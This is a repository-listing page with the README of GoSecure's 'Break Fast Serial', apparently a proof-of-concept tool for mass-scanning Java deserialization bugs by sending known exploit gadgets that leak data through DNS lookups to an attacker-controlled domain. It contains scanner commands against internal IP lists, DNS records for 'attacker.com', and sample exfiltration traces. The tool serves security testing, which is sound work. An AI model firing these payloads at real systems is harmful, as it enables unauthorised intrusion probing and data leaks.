https://github.com/gosecure/break-fast-serial

A proof of concept that demonstrates asynchronous scanning for Java deserialization bugs
https://github.com/gosecure/break-fast-serial

exploit java security serialization tool vulnerability

Last synced: 27 days ago
JSON representation

A proof of concept that demonstrates asynchronous scanning for Java deserialization bugs

• Host: GitHub
• URL: https://github.com/gosecure/break-fast-serial
• Owner: GoSecure
• License: mit
• Created: 2017-03-22T10:35:16.000Z (about 8 years ago)
• Default Branch: master
• Last Pushed: 2017-03-27T21:34:22.000Z (about 8 years ago)
• Last Synced: 2025-03-21T06:33:24.758Z (about 1 month ago)
• Topics: exploit, java, security, serialization, tool, vulnerability
• Language: Python
• Homepage:
• Size: 32.2 KB
• Stars: 54
• Watchers: 7
• Forks: 16
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

        
# Break Fast Serial

A proof of concept that demonstrates asynchronous scanning of deserialization bugs. It repackages [well known exploits](https://github.com/breenmachine/JavaUnserializeExploits) with a modified gadget that triggers DNS queries.

Detailed explanation: http://gosecure.net/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/

## DNS Chef configuration

The DNS Chef instance is a requirement to see the results of the scan.

This is the typical DNS configuration expected on your domain registrar. It will signify to other DNS servers that all subdomains of `attacker.com` must be resolved by the DNS server host at `10.11.12.13`.

```

NS scanme.attacker.com dnschef.attacker.com

A dnschef.attacker.com 10.11.12.13

```

 - `10.11.12.13` : The public IP address that is 

 - `attacker.com` : A domain name you own

It is highly recommended to use this [modified version of DNS Chef](./dnschef) that decodes the metadata placed by the scanner.

## Single IP scan

Launch DNSChef

```

python dnschef.py -q --fakeip 127.0.0.1 -i 0.0.0.0

```

Launch the scanner

```

python breakfast.py -t 192.168.40.1 -p 7001 -d scanme.attacker.com

```

## Mass Scan

Build a list of ip/hostname with open **HTTP** ports. Use a port scanner such as NMAP to identify port that respond to HTTP.

```

$ cat list_servers.txt

192.168.40.10:80

192.168.40.24:8181

192.168.40.100:7001

192.168.40.100:8080

192.168.40.102:8080

192.168.40.102:8001

```

Launch DNSChef

```

python dnschef.py -q --fakeip 127.0.0.1 -i 0.0.0.0

```

Launch the scanner

```

cat list_servers.txt | python breakfast.py -stdin -d scanme.attacker.com

```

## Expected response

If the vulnerability is confirmed, the expected trace from DNS Chef is as follows.

```

['843', 'jboss', '192.168.40.24', '8181']

[06:16:44] 69.165.172.165: cooking the response of type 'A' for 3834333a6a626f73733a3132372e302e302e313a38313831.scanme.fsociety.com to 127.0.0.1

['914', 'jenkins-cli', '192.168.40.102', '8080']

[06:16:45] 173.194.103.14: cooking the response of type 'A' for 3931343a6a656e6b696e732d636c693a3132372e302e302e313a38303830.scanme.fsociety.com to 127.0.0.1

```